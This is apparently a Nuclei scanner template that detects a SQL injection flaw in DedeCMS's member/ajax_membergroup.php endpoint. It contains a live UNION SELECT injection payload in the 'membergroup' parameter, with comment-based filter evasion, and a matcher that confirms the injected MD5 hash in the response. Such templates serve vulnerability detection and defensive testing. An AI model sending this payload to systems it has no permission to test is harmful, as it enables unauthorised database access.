id: dedecms-membergroup-sqli info: name: DedeCMS Membergroup SQLI author: pikpikcu severity: medium description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter. reference: - http://www.dedeyuan.com/xueyuan/wenti/1244.html tags: sqli,dedecms variables: num: "999999999" requests: - method: GET path: - "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{num}})+--+@`'`" matchers-condition: and matchers: - type: word words: - '{{md5({{num}})}}' part: body - type: status status: - 200